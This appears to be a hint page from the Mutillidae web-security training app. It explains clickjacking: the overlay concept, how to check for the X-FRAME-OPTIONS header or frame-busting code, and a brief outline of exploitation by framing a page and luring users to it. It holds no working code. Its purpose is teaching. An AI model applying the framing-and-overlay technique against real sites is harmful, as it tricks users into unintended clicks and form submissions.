Click-Jacking


Overview

Click Jacking may occcur when an attacker is able to frame the target web page. This can allow the attacker to overlay an invisible block of HTML such as an invisible form. When the user clicks on what they think is the legitimate web page, they are interacting with the overlay instead. If the overlay happens to be a form (for example), the user is filling out and submitting the fake form.

Discovery Methodology

Check to see if the site send the X-FRAME-OPTIONS HTTP header with a value of DENY or SAMEORIGIN. If the X-FRAME-OPTIONS HTTP header is not present in each response, check if JavaScript "frame-busting" code is present.

Exploitation

Frame the target web application page and overlay the page with the desired HTML. Send a link to the framing page to target users.

Example

Mutillidae overlays the page with a div which follows the mouse around. When the user clicks anywhere, they inevitably click the div which then executes the JavaScript in the onclick event.